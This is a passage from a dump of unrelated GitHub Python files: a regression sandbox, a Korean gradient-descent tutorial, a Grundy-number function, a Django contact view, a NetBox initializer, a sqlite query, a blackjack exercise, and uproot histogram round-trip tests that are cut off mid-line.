normalize= True,\n tol = 0.00001,\n solver='lsqr', # auto, 
svd, cholesky, lsqr, sparse_cg, sag, saga\n )\n rfr.fit(Z_train,YY[train_vector])\n print(k)\n print(rfr.score(Z_train,YY[train_vector]))\n print(rfr.score(Z_test,YY[test_vector]))\n print()\n\nrfr = Ridge(\n alpha=0.1,\n fit_intercept = True,\n normalize= True,\n tol = 0.00001,\n solver='lsqr', # auto, svd, cholesky, lsqr, sparse_cg, sag, saga\n)\n# rfr.fit(Z[predictor_columns].loc[train_vector],(Z['metric2'].loc[train_vector]))\n# print(k)\n# print(rfr.score(Z[predictor_columns].loc[train_vector],(Z['metric2'].loc[train_vector])))\n# print(rfr.score(Z[predictor_columns].loc[test_vector],(Z['metric2'].loc[test_vector])))\nrfr.fit(Z_train,YY[train_vector])\nprint(rfr.score(Z_train,YY[train_vector]))\nprint(rfr.score(Z_test,YY[test_vector]))\nprint()\n\n\n\n\nmodel_dict = {\n 'model': rfr\n}\n\nwith open('value_regression.pkl', 'wb') as f:\n pickle.dump(model_dict,f)\n\nZ['metric2_predict'] = rfr.predict(Z_poly)\n\nfor i in range(12):\n o2 = []\n ss = 0\n # for i in range(len(tsvs)):\n tsv = o[test_inds[i]][0]\n col_no = o[test_inds[i]][1]\n A = Z.loc[(Z['DB']==tsv) & (Z['col_no']==col_no),['metric1','metric2','metric2_predict','index']]\n l = A.values.tolist()\n l.sort(key = lambda z: z[2], reverse=True)\n for ii in range(min(20,len(l))):\n print(l[ii])\n print()\n print()\n\nprint(\"\\t\".join([str(kk) for kk in l[0]]))\nk = 0\nif 1.5 in [i[0] for i in l]:\n best_ind = [i[0] for i in l].index(1.5)\n best_ind_score = l[best_ind][2]\nelse:\n best_ind = None\n best_ind_score = None\nwhile (l[k][1]==1) and (k < len(l)):\n k += 1\nif k == 0:\n o2.append((k,best_ind,best_ind_score,None,None,l[k][1],l[k][2]))\nelif k == len(l):\n o2.append((k,best_ind,best_ind_score,l[k-1][1],l[k-1][2],None,None))\nelse:\n o2.append((k,best_ind,best_ind_score,l[k-1][1],l[k-1][2],l[k][1],l[k][2]))\n\n\n\n\n","repo_name":"cemarks/metadata_automation","sub_path":"sandbox/learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":11274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4872440609","text":"import random\r\nimport matplotlib.pyplot as plt\r\nfrom typing import List, Callable, TypeVar, Iterator\r\nfrom scratch.linear_algebra import distance, add, scalar_multiply, vector_mean\r\n\r\nVector = List[float]\r\n# 경사 하강법\r\n# 그래디언트 계산하기\r\ndef difference_quotient(f: Callable[[float], float], x: float, h: float) -> float:\r\n return (f(x+h) - f(x)) / h\r\n\r\ndef plot_estimated_derivative():\r\n def square(x):\r\n return x*x\r\n def derivative(x):\r\n return 2 * x\r\n\r\n xs = range(-10, 11)\r\n actuals = [derivative(x) for x in xs]\r\n estimate = [difference_quotient(square, x, h= 0.001) for x in xs]\r\n\r\n plt.title(\"Actual Derivatives vs Estimates\")\r\n plt.plot(xs, actuals, 'rx', label = 'Actual')\r\n plt.plot(xs, estimate, 'b+', label='Estimates')\r\n plt.legend(loc=9)\r\n plt.show()\r\n\r\nplot_estimated_derivative()\r\n\r\ndef partial_difference_quotient(f: Callable[[Vector], float], v: Vector, i: int, h: float) -> float:\r\n # 함수 f의 i번째 편도함수가 v에서 가지는 값\r\n w = [v_j + (h if j == i else 0) for j, v_j in enumerate(v)]\r\n\r\ndef estimate_gradient(f: Callable[[Vector], float], v: Vector, h: float = 0.0001):\r\n return [partial_difference_quotient(f,v,i,h) for i in range(len(v))]\r\n\r\n#그레디언트 적용하기\r\ndef gradient_step(v: Vector, gradient: Vector, step_size: float) -> Vector:\r\n # v에서 step_size만큼 이동하기\r\n assert len(v) == len(gradient)\r\n step = scalar_multiply(step_size, gradient)\r\n return add(v, step)\r\n\r\ndef 
sum_of_squares_gradient(v: Vector) -> Vector:\r\n return [2 * v_i for v_i in v]\r\n\r\n# 임의의 시작점을 선택\r\nv = [random.uniform(-10, 10)for i in range(3)]\r\n\r\nfor epoch in range(1000):\r\n grad = sum_of_squares_gradient(v) # v의 그래디언트 계산\r\n v = gradient_step(v, grad, -0.01) # 그래디언트의 음수만큼 이동`\r\n print(epoch, v)\r\n\r\nassert distance(v, [0,0,0]) < 0.001 # v는 0에 수렴해야 한다.\r\n\r\n#경사 하강법으로 모델 학습\r\n# 한 개의 데이터 포인트에서 오차의 그래디언트를 계산해 주는 함수\r\ndef linear_gradient(x: float, y: float, theta: Vector) -> Vector:\r\n slope, intercept = theta\r\n predicted = slope * x + intercept # 모델의 예측값\r\n error = (predicted - y) # 오차는 (예측값 - 실제값)\r\n squared_error = error ** 2 # 오차의 제곱을 최소화하자\r\n grad = [2 * error * x, 2 * error] # 그래디언트를 사용한다.\r\n return grad\r\n\r\n# 전체 데이터 셋에서 평균 제곱 오차의 그래디어튼를 계산해 주는 함수\r\ntheta = [random.uniform(-1, 1), random.uniform(-1, 1)]\r\n\r\nlearning_rate = 0.001\r\ninputs = [(x, 20 * x + 5) for x in range(-50, 50)]\r\n\r\nfor epoch in range(5000):\r\n grad = vector_mean([linear_gradient(x, y, theta) for x, y in inputs])\r\n theta = gradient_step(theta, grad, -learning_rate)\r\n\r\nslope, intercept = theta\r\nassert 19.9 < slope < 20.1\r\nassert 4.9 < intercept < 5.1\r\n\r\n#미니배치 경사 하강법\r\nT = TypeVar('T') # 변수의 타입과 무관한 함수를 생성\r\n\r\ndef minibatches(dataset: List[T], batch_size: int, shuffle: bool = True) -> Iterator[List[T]]:\r\n #dataset에서 batch_size만큼 데이터 포인트를 샘플링해서 미니배치를 생성\r\n #각 미니배치의 시작점인 0, batch_size, 2 * batch_size, ...을 나열\r\n batch_starts = [start for start in range(0, len(dataset), batch_size)]\r\n\r\n if shuffle: random.shuffle(batch_starts) #미니배치의 순서를 섞는다.\r\n\r\n for start in batch_starts:\r\n end = start + batch_size\r\n yield dataset[start:end]\r\n\r\n #미니배치\r\n theta = [random.uniform(-1, 1), random.uniform(-1, 1)]\r\n\r\n for epoch in range(1000):\r\n for batch in minibatches(inputs, batch_size=20):\r\n grad = vector_mean([linear_gradient(x, y, theta) for x, y in batch])\r\n theta = gradient_step(theta, grad, -learning_rate)\r\n print(epoch, theta)\r\n\r\n slope, intercept = theta\r\n assert 19.9 < slope < 20.1\r\n assert 4.9 < intercept < 5.1\r\n\r\n #SGD(stochastic gradient descent)\r\n for epoch in range(500):\r\n for x, y in inputs:\r\n grad = linear_gradient(x, y, theta)\r\n theta = gradient_step(theta, grad, -learning_rate)\r\n print(epoch, theta)\r\n\r\n slope, intercept = theta\r\n assert 19.9 < slope < 20.1\r\n assert 4.9 < intercept < 5.1","repo_name":"thoonk/DataScience","sub_path":"ch04/Gradient_descent.py","file_name":"Gradient_descent.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"9899601384","text":"def calculateMex(Set): \n Mex = 0\n \n while (Mex in Set): \n Mex += 1\n \n return (Mex) \n \n# A function to Compute Grundy Number of 'n' \n# Only this function varies according to the game \ndef calculateGrundy( n, dp): \n if (n == 0): \n return (0) \n \n if dp[n]!=-1:\n return dp[n]\n \n Set = set() # A Hash Table \n\n for i in range(n): \n \n Set.add(calculateGrundy(i,dp)); \n \n dp[n]=calculateMex(Set)\n return (dp[n])\n \n# Driver program to test above functions \nn = 5; \ndp=[-1]*(n+1)\nprint(calculateGrundy(n,dp)) \nprint(dp)","repo_name":"NavalPangtey/Competitive-programming","sub_path":"python/algo/grundyno.py","file_name":"grundyno.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3605657744","text":"from django.core.mail import 
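# The same gradient-descent loop in miniature, on f(v) = sum(v_i^2) whose
# gradient is 2*v (pure Python, no dependencies):
v_demo = [4.0, -2.0, 1.0]
for _ in range(1000):
    grad = [2 * vi for vi in v_demo]                          # gradient of the squared norm
    v_demo = [vi - 0.01 * gi for vi, gi in zip(v_demo, grad)] # step against the gradient
assert all(abs(vi) < 1e-3 for vi in v_demo)                   # converges to the minimum at 0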
EmailMessage\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import View\nfrom django.http import HttpResponse\nfrom django.contrib import messages\n\nfrom .forms import ContactForm\n\ndef contact(request):\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if form.is_valid():\n sender_name = form.cleaned_data['name']\n sender_email = form.cleaned_data['email']\n\n sender_message = form.cleaned_data['message']\n email = EmailMessage(\n \"New contact form submission on MASDAP\",\n sender_message,\n 'masdap.mw@gmail.com',\n ['masdap.mw@gmail.com'],\n cc=(sender_email,),\n headers = {'Reply-To': sender_email}\n )\n email.send()\n\n messages.success(request, 'Thanks for reaching out! Your message has been sent.')\n return redirect('contact')\n else:\n form = ContactForm()\n\n return render(request, 'contact.html', {\n 'form': form\n })\n","repo_name":"MalawiGeospatialTools/masdap","sub_path":"masdap/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"33114304233","text":"import sys\nfrom secrets.models import SecretRole\n\nfrom startup_script_utils import load_yaml\n\nsecret_roles = load_yaml(\"/opt/netbox/initializers/secret_roles.yml\")\n\nif secret_roles is None:\n sys.exit()\n\nfor params in secret_roles:\n secret_role, created = SecretRole.objects.get_or_create(**params)\n\n if created:\n print(\"🔑 Created Secret Role\", secret_role.name)\n","repo_name":"rafaeltadeu01/sifs","sub_path":"docker-compose/netbox/startup_scripts/310_secret_roles.py","file_name":"310_secret_roles.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"34697137806","text":"import sqlite3\r\n\r\n#connect the database\r\nconn = sqlite3.connect('Mulesoft SQL.db')\r\n\r\n#craete a cursor\r\nc = conn.cursor()\r\n\r\n#craete a Query\r\nc.execute(\"SELECT * FROM Movies\")\r\n\r\nc.execute(\"SELECT Name FROM Movies Where Actor = 'Salman Khan'\")\r\n\r\nprint(c.fetchall())\r\n\r\n#commit the db\r\nconn.commit\r\n\r\n#Close the db\r\nconn.close\r\n","repo_name":"Xmen143/SQLite-Project","sub_path":"sqlite31.py","file_name":"sqlite31.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34671335414","text":"from pxr import Usd, UsdSkel, UsdGeom\nimport unittest\n\n\nclass TestUsdSkelRoot(unittest.TestCase):\n\n def test_ComputeExtentPlugin(self):\n \"\"\"Tests plugin for computing extents on a UsdSkelRoot.\"\"\"\n\n testFile = \"root.usda\"\n stage = Usd.Stage.Open(testFile)\n\n boundable = UsdGeom.Boundable(stage.GetPrimAtPath(\"/Root\"))\n\n for time in range(int(stage.GetStartTimeCode()),\n int(stage.GetEndTimeCode())+1):\n UsdGeom.Boundable.ComputeExtentFromPlugins(boundable, time)\n\n stage.GetRootLayer().Export(\"root.computedExtents.usda\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"PixarAnimationStudios/OpenUSD","sub_path":"pxr/usd/usdSkel/testenv/testUsdSkelRoot.py","file_name":"testUsdSkelRoot.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":5042,"dataset":"github-code","pt":"3"} +{"seq_id":"12544377100","text":"from gameLogic import Game\nimport random\n\ndef readAllWord(fileName):\n with open(fileName) as f:\n return [x.strip() for x in f.readlines()] \n\ndef 
getUniqueWord(listOfWords):\n return listOfWords[(random.randrange(0, len(listOfWords)))]\n\n\nif __name__ == \"__main__\":\n allWords =readAllWord(\"corpus.txt\")\n\n myGame = Game(5, getUniqueWord(allWords))\n \n myGame.gameStart()\n ","repo_name":"CiprianBodnar/CLM-laboratories","sub_path":"laborator3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27210351321","text":"def blackjack_advice():\n card_points = {\n 'A': 1,\n '2': 2,\n '3': 3,\n '4': 4,\n '5': 5,\n '6': 6,\n '7': 7,\n '8': 8,\n '9': 9,\n '10': 10,\n 'J': 10,\n 'Q': 10,\n 'K': 10\n }\n\n choice1 = input('What is your first card? ')\n choice2 = input('What is your second card? ')\n choice3 = input('What is your third card? ')\n\n card_sum = int(card_points[choice1]) + int(card_points[choice2]) + int(card_points[choice3])\n \n if card_sum < 17:\n print(f'{card_sum} Hit')\n elif 17 <= card_sum < 21:\n print(f'{card_sum} Stay')\n elif card_sum == 21:\n print('Blackjack!')\n else: \n print('Already Busted')\n\nblackjack_advice()","repo_name":"PdxCodeGuild/class_HB2","sub_path":"code/zach/python/lab04_blackjack_advice.py","file_name":"lab04_blackjack_advice.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"18343438827","text":"# BSD 3-Clause License; see https://github.com/scikit-hep/uproot5/blob/main/LICENSE\n\nimport os\n\nimport numpy as np\nimport pytest\n\nimport uproot\nimport uproot.writing\n\nROOT = pytest.importorskip(\"ROOT\")\nhist = pytest.importorskip(\"hist\")\n\n\ndef test_regular_1d(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n with uproot.recreate(newfile) as fout:\n fout[\"h1\"] = (\n hist.Hist.new.Reg(10, -5, 5, name=\"wow\", label=\"wee\")\n .Weight()\n .fill([-2, 3, 3, 1, 99], weight=[1, 1, 5, 5, 3])\n )\n\n with uproot.open(newfile) as fin:\n h1 = fin[\"h1\"]\n assert h1.member(\"fEntries\") == 15\n assert h1.values(flow=True).tolist() == pytest.approx(\n [0, 0, 0, 0, 1, 0, 0, 5, 0, 6, 0, 3]\n )\n assert h1.axis().member(\"fName\") == \"xaxis\"\n assert h1.axis().member(\"fTitle\") == \"wee\"\n assert h1.axis().member(\"fXmin\") == -5\n assert h1.axis().member(\"fXmax\") == 5\n assert len(h1.axis().member(\"fXbins\")) == 0\n\n f = ROOT.TFile(newfile)\n h2 = f.Get(\"h1\")\n assert h2.GetEntries() == 15\n assert h2.GetBinContent(9) == 6\n assert h2.GetBinContent(11) == 3\n assert h2.GetXaxis().GetName() == \"xaxis\"\n assert h2.GetXaxis().GetTitle() == \"wee\"\n assert h2.GetBinLowEdge(1) == pytest.approx(-5)\n assert h2.GetBinWidth(1) == pytest.approx(1)\n f.Close()\n\n\ndef test_variable_1d(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n with uproot.recreate(newfile) as fout:\n fout[\"h1\"] = (\n hist.Hist.new.Var([-5, -3, 0, 1, 2, 10], name=\"wow\", label=\"wee\")\n .Weight()\n .fill([-2, 3, 3, 1, 99], weight=[1, 1, 5, 5, 3])\n )\n\n with uproot.open(newfile) as fin:\n h1 = fin[\"h1\"]\n assert h1.member(\"fEntries\") == 15\n assert h1.values(flow=True).tolist() == pytest.approx([0, 0, 1, 0, 5, 6, 3])\n assert h1.axis().member(\"fName\") == \"xaxis\"\n assert h1.axis().member(\"fTitle\") == \"wee\"\n assert h1.axis().member(\"fXmin\") == -5\n assert h1.axis().member(\"fXmax\") == 10\n assert list(h1.axis().member(\"fXbins\")) == pytest.approx([-5, -3, 0, 1, 2, 10])\n\n f = ROOT.TFile(newfile)\n h2 = f.Get(\"h1\")\n assert 
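# A tiny worked example of the mex ("minimum excludant") used by the Grundy
# computation above: the smallest non-negative integer absent from a set.
def mex(s):
    m = 0
    while m in s:
        m += 1
    return m

assert mex(set()) == 0
assert mex({0, 1, 3}) == 2
# For the game above (any pile 0..n-1 reachable), grundy(n) works out to n itself.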
h2.GetEntries() == 15\n assert h2.GetBinContent(5) == 6\n assert h2.GetBinContent(6) == 3\n assert h2.GetXaxis().GetName() == \"xaxis\"\n assert h2.GetXaxis().GetTitle() == \"wee\"\n assert h2.GetBinLowEdge(1) == pytest.approx(-5)\n assert h2.GetBinWidth(1) == pytest.approx(2)\n f.Close()\n\n\ndef test_regular_2d(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n with uproot.recreate(newfile) as fout:\n tmp = (\n hist.Hist.new.Reg(10, -5, 5, name=\"wow\", label=\"wee\")\n .Reg(8, 2, 10)\n .Weight()\n .fill([-2, 3, 3, 1, 99], [9, 9, 9, 4, 4], weight=[1, 1, 5, 5, 3])\n )\n asarray = tmp.values(flow=True)\n assert asarray[9, 8] == 6\n assert asarray[8, 9] == 0\n fout[\"h1\"] = tmp\n\n with uproot.open(newfile) as fin:\n h1 = fin[\"h1\"]\n assert h1.member(\"fEntries\") == 15\n assert h1.axis(0).member(\"fName\") == \"xaxis\"\n assert h1.axis(0).member(\"fTitle\") == \"wee\"\n assert h1.axis(0).member(\"fXmin\") == -5\n assert h1.axis(0).member(\"fXmax\") == 5\n assert h1.axis(1).member(\"fXmin\") == 2\n assert h1.axis(1).member(\"fXmax\") == 10\n assert np.allclose(asarray, h1.values(flow=True))\n assert np.allclose(asarray, h1.to_hist().values(flow=True))\n\n f = ROOT.TFile(newfile)\n h2 = f.Get(\"h1\")\n assert h2.GetEntries() == 15\n assert h2.GetBinContent(9, 8) == 6\n assert h2.GetBinContent(8, 9) == 0\n f.Close()\n\n\ndef test_regular_3d(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n with uproot.recreate(newfile) as fout:\n tmp = (\n hist.Hist.new.Reg(10, -5, 5, name=\"wow\", label=\"wee\")\n .Reg(8, 2, 10)\n .Reg(2, -2, 2)\n .Weight()\n .fill(\n [-2, 3, 3, 1, 99],\n [9, 9, 9, 4, 4],\n [1, 1, 1, -1, -1],\n weight=[1, 1, 5, 5, 3],\n )\n )\n asarray = tmp.values(flow=True)\n assert asarray[9, 8, 2] == 6\n assert asarray[8, 9, 2] == 0\n assert asarray[9, 8, 1] == 0\n fout[\"h1\"] = tmp\n\n with uproot.open(newfile) as fin:\n h1 = fin[\"h1\"]\n assert h1.member(\"fEntries\") == 15\n assert h1.axis(0).member(\"fName\") == \"xaxis\"\n assert h1.axis(0).member(\"fTitle\") == \"wee\"\n assert h1.axis(0).member(\"fXmin\") == -5\n assert h1.axis(0).member(\"fXmax\") == 5\n assert h1.axis(1).member(\"fXmin\") == 2\n assert h1.axis(1).member(\"fXmax\") == 10\n assert h1.axis(2).member(\"fXmin\") == -2\n assert h1.axis(2).member(\"fXmax\") == 2\n assert np.allclose(asarray, h1.values(flow=True))\n assert np.allclose(asarray, h1.to_hist().values(flow=True))\n\n f = ROOT.TFile(newfile)\n h2 = f.Get(\"h1\")\n assert h2.GetEntries() == 15\n assert h2.GetBinContent(9, 8, 2) == 6\n assert h2.GetBinContent(8, 9, 2) == 0\n assert h2.GetBinContent(9, 8, 1) == 0\n f.Close()\n\n\ndef test_issue_0659(tmp_path):\n # https://github.com/scikit-hep/uproot5/issues/659\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n cat_axis = hist.axis.IntCategory([10, 11, 12], label=\"Category\")\n reg_axis = hist.axis.Regular(100, 0, 100, label=\"Random\")\n reg_axis_z = hist.axis.Regular(50, 20, 30, label=\"RandomZ\")\n h = hist.Hist(cat_axis)\n h2 = hist.Hist(cat_axis, reg_axis)\n h3 = hist.Hist(cat_axis, reg_axis, reg_axis_z)\n h.fill(np.random.randint(1, 4, 1000))\n h2.fill(np.random.randint(1, 4, 1000), np.random.normal(20, 5, 1000))\n h3.fill(\n np.random.randint(1, 4, 1000),\n np.random.normal(20, 5, 1000),\n np.random.normal(25, 2, 1000),\n )\n\n with uproot.recreate(newfile) as fout:\n fout[\"h\"] = h\n fout[\"h2\"] = h2\n fout[\"h3\"] = h3\n\n with uproot.open(newfile) as fin:\n h_opened = fin[\"h\"]\n assert h_opened.values(flow=False).shape == (3,)\n assert 
h_opened.values(flow=True).shape == (5,)\n assert h_opened.axis(0).edges().tolist() == [0.0, 1.0, 2.0, 3.0]\n\n h2_opened = fin[\"h2\"]\n assert h2_opened.values(flow=False).shape == (3, 100)\n assert h2_opened.values(flow=True).shape == (5, 102)\n assert h2_opened.axis(0).edges().tolist() == [0.0, 1.0, 2.0, 3.0]\n assert h2_opened.axis(1).edges().tolist() == list(map(float, range(101)))\n\n h3_opened = fin[\"h3\"]\n assert h3_opened.values(flow=False).shape == (3, 100, 50)\n assert h3_opened.values(flow=True).shape == (5, 102, 52)\n assert h3_opened.axis(0).edges().tolist() == [0.0, 1.0, 2.0, 3.0]\n assert h3_opened.axis(1).edges().tolist() == list(map(float, range(101)))\n assert h3_opened.axis(2).edges().tolist() == list(np.linspace(20, 30, 51))\n\n h_opened.to_hist()\n h2_opened.to_hist()\n h3_opened.to_hist()\n\n f = ROOT.TFile(newfile)\n h_opened2 = f.Get(\"h\")\n h2_opened2 = f.Get(\"h2\")\n h3_opened2 = f.Get(\"h3\")\n\n assert h_opened2.GetBinContent(0) == 0.0\n assert h2_opened2.GetBinContent(0) == 0.0\n assert h3_opened2.GetBinContent(0) == 0.0\n\n f.Close()\n\n\ndef test_issue_722(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n h = ROOT.TH1D(\"h\", \"h\", 10, 0.0, 1.0)\n h.FillRandom(\"gaus\", 10000)\n\n assert len(h.GetSumw2()) == 0\n\n fout = ROOT.TFile(newfile, \"RECREATE\")\n h.Write()\n fout.Close()\n\n # open with uproot\n with uproot.open(newfile) as fin:\n h1 = fin[\"h\"]\n\n assert len(h1.axes) == 1\n assert h1.axis(0).edges().tolist() == pytest.approx(\n [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]\n )\n assert len(h1.member(\"fSumw2\")) == 0\n\n # convert to hist\n h2 = h1.to_hist()\n assert str(h2.storage_type) == \"\"\n\n # write and read again\n with uproot.recreate(newfile) as fout2:\n fout2[\"h\"] = h2\n\n with uproot.open(newfile) as fin2:\n h3 = fin2[\"h\"]\n\n assert len(h3.member(\"fSumw2\")) == 0\n\n\ndef test_hist_weights_from_root(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n h = ROOT.TH1D(\"h\", \"h\", 20, 0.0, 5.0)\n for _ in range(1000):\n # fill with random values and random weights\n h.Fill(5.0 * np.random.random(), np.random.random())\n\n assert len(h.GetSumw2()) == 22 # 20 bins + 2, should not be 0 since we have weights\n\n fout = ROOT.TFile(newfile, \"RECREATE\")\n h.Write()\n fout.Close()\n\n with uproot.open(newfile) as fin:\n h1 = fin[\"h\"]\n\n assert len(h1.member(\"fSumw2\")) == 22\n\n h2 = h1.to_hist()\n assert str(h2.storage_type) == \"\"\n\n # write and read again\n with uproot.recreate(newfile) as fout2:\n fout2[\"h\"] = h2\n\n with uproot.open(newfile) as fin2:\n h3 = fin2[\"h\"]\n\n assert len(h3.member(\"fSumw2\")) == 22\n\n\ndef test_hist_weights_labels_from_root(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n h_weights = ROOT.TH1D(\n \"h_weights\", \"histogram with weights with labels\", 12, 0.0, 5.0\n )\n h_noweights = ROOT.TH1D(\n \"h_noweights\", \"histogram without weights with labels\", 12, 0.0, 5.0\n )\n h_noweights_nolabels = ROOT.TH1D(\n \"h_noweights_nolabels\", \"histogram without weights\", 12, 0.0, 5.0\n )\n for _ in range(1000):\n # fill with random values and random weights\n h_weights.Fill(5.0 * np.random.random(), np.random.random())\n h_noweights.Fill(5.0 * np.random.random())\n h_noweights_nolabels.Fill(5.0 * np.random.random())\n\n assert h_weights.GetNbinsX() == h_noweights.GetNbinsX()\n for i in range(h_weights.GetNbinsX()):\n h_weights.GetXaxis().SetBinLabel(i + 1, f\"label_{i}\")\n h_noweights.GetXaxis().SetBinLabel(i + 1, 
f\"label_{i}\")\n\n assert len(h_weights.GetSumw2()) == 14 # 12 bins + 2\n assert len(h_noweights.GetSumw2()) == 0\n assert len(h_noweights_nolabels.GetSumw2()) == 0\n assert h_weights.GetXaxis().GetLabels().GetSize() == 12\n assert h_noweights.GetXaxis().GetLabels().GetSize() == 12\n\n fout = ROOT.TFile(newfile, \"RECREATE\")\n h_weights.Write()\n h_noweights.Write()\n h_noweights_nolabels.Write()\n fout.Close()\n\n with uproot.open(newfile) as fin:\n h_weights1 = fin[\"h_weights\"]\n h_noweights1 = fin[\"h_noweights\"]\n h_noweights_nolabels1 = fin[\"h_noweights_nolabels\"]\n\n assert len(h_weights1.member(\"fSumw2\")) == 14\n assert len(h_noweights1.member(\"fSumw2\")) == 0\n assert len(h_noweights_nolabels1.member(\"fSumw2\")) == 0\n\n h_weights2 = h_weights1.to_hist()\n h_noweights2 = h_noweights1.to_hist()\n h_noweights_nolabels2 = h_noweights_nolabels1.to_hist()\n assert str(h_weights2.storage_type) == \"\"\n assert str(h_noweights2.storage_type) == \"\"\n assert (\n str(h_noweights_nolabels2.storage_type)\n == \"\"\n )\n\n\ndef test_hist_weights_2D(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n h_2D_noweights_nolabels = ROOT.TH2D(\n \"h_2D_noweights_nolabels\", \"2D\", 20, 0.0, 5.0, 10, -10.0, 10.0\n )\n h_2D_weights_nolabels = ROOT.TH2D(\n \"h_2D_weights_nolabels\", \"2D\", 20, 0.0, 5.0, 10, -10.0, 10.0\n )\n h_2D_noweights_labels = ROOT.TH2D(\n \"h_2D_noweights_labels\", \"2D\", 20, 0.0, 5.0, 10, -10.0, 10.0\n )\n h_2D_weights_labels = ROOT.TH2D(\n \"h_2D_weights_labels\", \"2D\", 20, 0.0, 5.0, 10, -10.0, 10.0\n )\n\n for _ in range(1000):\n # fill with random values and random weights\n h_2D_noweights_nolabels.Fill(\n 5.0 * np.random.random(), 10.0 * np.random.random()\n )\n h_2D_weights_nolabels.Fill(\n 5.0 * np.random.random(), 10.0 * np.random.random(), np.random.random()\n )\n h_2D_noweights_labels.Fill(5.0 * np.random.random(), 10.0 * np.random.random())\n h_2D_weights_labels.Fill(\n 5.0 * np.random.random(), 10.0 * np.random.random(), np.random.random()\n )\n\n assert (\n h_2D_noweights_nolabels.GetNbinsX()\n == h_2D_weights_nolabels.GetNbinsX()\n == h_2D_noweights_labels.GetNbinsX()\n == h_2D_weights_labels.GetNbinsX()\n == 20\n )\n assert (\n h_2D_noweights_nolabels.GetNbinsY()\n == h_2D_weights_nolabels.GetNbinsY()\n == h_2D_noweights_labels.GetNbinsY()\n == h_2D_weights_labels.GetNbinsY()\n == 10\n )\n for i in range(h_2D_weights_labels.GetNbinsX()):\n h_2D_weights_labels.GetXaxis().SetBinLabel(i + 1, f\"label_{i}\")\n h_2D_noweights_labels.GetXaxis().SetBinLabel(i + 1, f\"label_{i}\")\n for i in range(h_2D_noweights_labels.GetNbinsY()):\n # add y labels to this one\n h_2D_noweights_labels.GetYaxis().SetBinLabel(i + 1, f\"label_{i}\")\n\n assert (\n len(h_2D_weights_nolabels.GetSumw2())\n == len(h_2D_weights_labels.GetSumw2())\n == 264\n )\n assert (\n len(h_2D_noweights_nolabels.GetSumw2())\n == len(h_2D_noweights_labels.GetSumw2())\n == 0\n )\n\n assert (\n h_2D_weights_labels.GetXaxis().GetLabels().GetSize()\n == h_2D_noweights_labels.GetXaxis().GetLabels().GetSize()\n == 20\n )\n assert h_2D_noweights_labels.GetYaxis().GetLabels().GetSize() == 10\n\n fout = ROOT.TFile(newfile, \"RECREATE\")\n h_2D_noweights_nolabels.Write()\n h_2D_weights_nolabels.Write()\n h_2D_noweights_labels.Write()\n h_2D_weights_labels.Write()\n fout.Close()\n\n with uproot.open(newfile) as fin:\n h_2D_noweights_nolabels = fin[\"h_2D_noweights_nolabels\"]\n h_2D_weights_nolabels = fin[\"h_2D_weights_nolabels\"]\n h_2D_noweights_labels = fin[\"h_2D_noweights_labels\"]\n 
h_2D_weights_labels = fin[\"h_2D_weights_labels\"]\n\n h_2D_noweights_nolabels.to_hist()\n h_2D_weights_nolabels.to_hist()\n h_2D_noweights_labels.to_hist()\n h_2D_weights_labels.to_hist()\n\n\ndef test_hist_weights_3D(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n h_3D_noweights_nolabels = ROOT.TH3D(\n \"h_3D_noweights_nolabels\", \"3D\", 20, 0.0, 5.0, 10, -10.0, 10.0, 5, -5.0, 5.0\n )\n h_3D_weights_nolabels = ROOT.TH3D(\n \"h_3D_weights_nolabels\", \"3D\", 20, 0.0, 5.0, 10, -10.0, 10.0, 5, -5.0, 5.0\n )\n h_3D_noweights_labels = ROOT.TH3D(\n \"h_3D_noweights_labels\", \"3D\", 20, 0.0, 5.0, 10, -10.0, 10.0, 5, -5.0, 5.0\n )\n h_3D_weights_labels = ROOT.TH3D(\n \"h_3D_weights_labels\", \"3D\", 20, 0.0, 5.0, 10, -10.0, 10.0, 5, -5.0, 5.0\n )\n\n for _ in range(1000):\n # fill with random values and random weights\n h_3D_noweights_nolabels.Fill(\n 5.0 * np.random.random(), 10.0 * np.random.random(), 2 * np.random.random()\n )\n h_3D_weights_nolabels.Fill(\n 5.0 * np.random.random(),\n 10.0 * np.random.random(),\n 2 * np.random.random(),\n np.random.random(),\n )\n h_3D_noweights_labels.Fill(\n 5.0 * np.random.random(), 10.0 * np.random.random(), 2 * np.random.random()\n )\n h_3D_weights_labels.Fill(\n 5.0 * np.random.random(),\n 10.0 * np.random.random(),\n 2 * np.random.random(),\n np.random.random(),\n )\n\n assert (\n 